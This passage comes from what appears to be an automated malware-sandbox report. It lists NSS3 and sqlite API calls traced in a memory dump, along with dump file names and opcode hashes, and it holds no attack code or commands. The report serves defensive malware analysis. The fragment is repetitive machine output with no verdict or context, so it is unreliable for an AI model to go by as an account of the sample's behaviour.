                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE5B014
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CE5B028
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE5B03C
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                                                                                                                                                                                                                      • String ID: %s decr => %d$Unloaded library %s
                                                                                                                                                                                                                                                                                                                      • API String ID: 4015679603-2877805755
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d46f66b6b069d196a5d17b797acf2fea7e70d93076eea82a4a74f347eb0aee39
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3c5df353e40d13ba1d48d2cf7994163ebb33fbc8a3a317fc7e9d49f6a89491df
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d46f66b6b069d196a5d17b797acf2fea7e70d93076eea82a4a74f347eb0aee39
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A31D5B5F84111ABEB019F64DC41B66B775EB0670CB788125E80597B00E723E935D7F2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CEA781D,00000000,6CE9BE2C,?,6CEA6B1D,?,?,?,?,00000000,00000000,6CEA781D), ref: 6CEA6C40
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CEA781D,?,6CE9BE2C,?), ref: 6CEA6C58
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CEA781D), ref: 6CEA6C6F
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CEA6C84
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CEA6C96
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: TlsGetValue.KERNEL32(00000040,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51267
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: EnterCriticalSection.KERNEL32(?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE5127C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE51291
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE51240: PR_Unlock.NSS3(?,?,?,?,6CE5116C,NSPR_LOG_MODULES), ref: 6CE512A0
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CEA6CAA
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                                                      • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 340527bd7cf8fcfb91a735675c82d0fa6fba02fdd80f8472d23922afb8a3c69d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b1135c51ff10a669e2e79cd9ae3d29d82524c5256081b2dcd0112cdac42ae562
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 340527bd7cf8fcfb91a735675c82d0fa6fba02fdd80f8472d23922afb8a3c69d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D20184B5B02301BBE55027E96CC9F57756C9B4225DF340432FE14E8A41EB97E91640A9
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetErrorText.NSS3(00000000,00000000,?,6CE778F8), ref: 6CEB4E6D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE509E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CE506A2,00000000,?), ref: 6CE509F8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE509E0: malloc.MOZGLUE(0000001F), ref: 6CE50A18
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE509E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CE50A33
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CE778F8), ref: 6CEB4ED9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CEA7703,?,00000000,00000000), ref: 6CEA5942
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CEA7703), ref: 6CEA5954
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEA596A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CEA5984
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CEA5999
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: free.MOZGLUE(00000000), ref: 6CEA59BA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CEA59D3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: free.MOZGLUE(00000000), ref: 6CEA59F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CEA5A0A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: free.MOZGLUE(00000000), ref: 6CEA5A2E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CEA5A43
                                                                                                                                                                                                                                                                                                                      • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4EB3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CEB4EB8,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB484C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CEB4EB8,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB486D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CEB4EB8,?), ref: 6CEB4884
                                                                                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4EC0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB4470: TlsGetValue.KERNEL32(00000000,?,6CE77296,00000000), ref: 6CEB4487
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB4470: EnterCriticalSection.KERNEL32(?,?,?,6CE77296,00000000), ref: 6CEB44A0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB4470: PR_Unlock.NSS3(?,?,?,?,6CE77296,00000000), ref: 6CEB44BB
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4F16
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4F2E
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4F40
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4F6C
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4F80
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB4F8F
                                                                                                                                                                                                                                                                                                                      • PK11_UpdateSlotAttribute.NSS3(?,6CF8DCB0,00000000), ref: 6CEB4FFE
                                                                                                                                                                                                                                                                                                                      • PK11_UserDisableSlot.NSS3(0000001E), ref: 6CEB501F
                                                                                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CE778F8), ref: 6CEB506B
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 560490210-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: aca4a3431ae50ae65dcd86d79697d2900b934c46f7dffd4d7a43bcb0eeede364
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7e112ccadd18f7028f2a2911c7d55d5584d9febd6c68341b639d7cd96e357fb6
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aca4a3431ae50ae65dcd86d79697d2900b934c46f7dffd4d7a43bcb0eeede364
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C851C4B1E016029FDB119F64ED41ABB77B4EF0531CF24453AE80667B12F732D625CA92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 786543732-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 88e5997cb01cb28fc25adc8e382c3dc82041f1ab6ec2c065cb1c18435457e325
                                                                                                                                                                                                                                                                                                                      • Instruction ID: edc337feef234256c9114450d616c14bd9b64a73e65ad6b46cb48d2f4c047dfb
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88e5997cb01cb28fc25adc8e382c3dc82041f1ab6ec2c065cb1c18435457e325
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6517DB1F511168BDB40EF58D8817BF77B8AB0634CF644126D805A7B00E732AA65CBE6
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6CF34CAF
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CF34CFD
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6CF34D44
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                                                      • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 59459f2d147db16c979b8ea49ef8eb561452202e0e5b6980fc374cfd54e40bcb
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d45270629573b87a611fdff9237ef92246945cb39d638d8d8b25a8889af8bc37
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59459f2d147db16c979b8ea49ef8eb561452202e0e5b6980fc374cfd54e40bcb
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65313A73E48931B7EB154624A8117E6BF7177C2358F192129D82D4BE54C723AC61C7E2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6CF32D9F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: EnterCriticalSection.KERNEL32(?,?,?,6CE4F9C9,?,6CE4F4DA,6CE4F9C9,?,?,6CE1369A), ref: 6CDECA7A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CDECB26
                                                                                                                                                                                                                                                                                                                      • sqlite3_exec.NSS3(?,?,6CF32F70,?,?), ref: 6CF32DF9
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CF32E2C
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF32E3A
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF32E52
                                                                                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6CF9AAF9,?), ref: 6CF32E62
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF32E70
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF32E89
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF32EBB
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF32ECB
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CF32F3E
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CF32F4C
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1957633107-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5021fcedb1ae62b9578c91b4cff1af96667daaf4688ab4619e5acc883a30c174
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9600b341ad8488b6b61398f533e8a8024a5f7523d8c54e5b110d694134945e39
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5021fcedb1ae62b9578c91b4cff1af96667daaf4688ab4619e5acc883a30c174
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E461B1B5E01225ABEB01CF68D885BDEB7B1EF48348F115024DD19A7752E732E844CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2120,Function_00097E60,00000000,?,?,?,?,6CEF067D,6CEF1C60,00000000), ref: 6CE77C81
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: TlsGetValue.KERNEL32(?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4C97
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CB0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CC9
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE77CA0
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE77CB4
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE77CCF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE77D04
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE77D1B
                                                                                                                                                                                                                                                                                                                      • realloc.MOZGLUE(-00000050), ref: 6CE77D82
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE77DF4
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE77E0E
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2305085145-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 109f83754646b396fc40937be21e07281aa93ed6613f75b81babf6190a4884b5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 60d314012e9132b331d8d8b37e617a84868763a4762ef0c50995e2f026ab29d2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 109f83754646b396fc40937be21e07281aa93ed6613f75b81babf6190a4884b5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E51F271F142009FDB62AF28CC84B6677B5EB4731CF365129EE0487722EB329951CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4C97
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CB0
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4CC9
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4D11
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4D2A
                                                                                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4D4A
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4D57
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4D97
                                                                                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4DBA
                                                                                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3 ref: 6CDE4DD4
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4DE6
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CDE3921,6CFC14E4,6CF2CC70), ref: 6CDE4DEF
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
